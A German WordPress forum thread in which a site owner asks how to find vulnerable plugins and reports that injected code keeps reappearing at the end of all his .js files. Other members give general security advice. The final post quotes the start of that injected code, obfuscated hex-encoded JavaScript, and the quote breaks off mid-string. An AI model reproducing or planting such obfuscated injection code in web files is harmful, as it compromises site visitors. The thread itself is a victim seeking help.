1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Website oder Thread mit Hack-Warnung?

Dieses Thema im Forum "Plugins und Widgets" wurde erstellt von davtedo, 6. Februar 2016.

  1. davtedo

    davtedo Member

    Registriert seit:
    6. Februar 2016
    Beiträge:
    14
    Zustimmungen:
    1
    Gibt es eine Website oder einen Thread, wo eine Liste von Plugins geführt wird, die verantwortlich für Hacks bzw. Sicherheitslücken sind?

    Oder wie findet man heraus, ob ein Plugin Sicherheitslücken hat?

    Ich habe nämlich das Problem, vermutlich gehackt worden zu sein. Da meine Passworte sehr lang und komplex sind (25 Zeichen, von Keepass generiert) und ich mir nicht vorstellen kann, dass ausgerechnet in meiner Site Wordpress-Lücken ausgenutzt werden, vermute ich die Ursache bei einem Plugin.
     
  2. SirEctor

    SirEctor Well-Known Member
    Ehrenmitglied

    Registriert seit:
    28. Oktober 2008
    Beiträge:
    12.361
    Zustimmungen:
    427
    Plugins nur aus offizieller Stelle laden und immer aktuell halten. Zusätzlich darauf achten, dass auch regelmäßig Updates kommen. Für das Theme gilt das gleich, sowie natürlich für Wordpress auch.

    Zusätzlich schauen ob dein PC sauber ist und sämtliche PCs, die Zugriff auf Wordpress bzw. FTP oder Datenbank haben.
     
  3. maxe

    maxe Well-Known Member
    Ehrenmitglied

    Registriert seit:
    1. Mai 2008
    Beiträge:
    19.581
    Zustimmungen:
    277
  4. davtedo

    davtedo Member

    Registriert seit:
    6. Februar 2016
    Beiträge:
    14
    Zustimmungen:
    1
    Danke maxe ! Da steht gleich ganz oben MailPoet drauf – hatte ich leider drin. Mist.
     
  5. davtedo

    davtedo Member

    Registriert seit:
    6. Februar 2016
    Beiträge:
    14
    Zustimmungen:
    1
    Das ist doch überhaupt keine Antwort auf meine Frage.
     
  6. SirEctor

    SirEctor Well-Known Member
    Ehrenmitglied

    Registriert seit:
    28. Oktober 2008
    Beiträge:
    12.361
    Zustimmungen:
    427
    Nein, sind nur Hinweise. Habe ich aber gern gemacht.
     
  7. Tolive

    Tolive Well-Known Member

    Registriert seit:
    12. Juni 2010
    Beiträge:
    65
    Zustimmungen:
    0
    @davtedo Wie kommst du darauf, dass du eventuell gehackt wurdest?
     
  8. davtedo

    davtedo Member

    Registriert seit:
    6. Februar 2016
    Beiträge:
    14
    Zustimmungen:
    1
    Weil ALLE *.js-Files am Dateiende Fremd-Code enthalten.
    Spiele ich ein Backup mit sauberen Files ein, sind nach wenigen Stunden alle *.js-Files wieder damit infiziert.

    So sehe die ersten paar Zeilen dieses Fremd-Codes aus (von etwa 20 mal so vielen):
    /*304260db287a80b13ff0ed9fd9ed1b79*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x69\x61\x73\x6e\x64"]=["\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\
     
    #8 davtedo, 10. Februar 2016
    Zuletzt bearbeitet: 10. Februar 2016
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden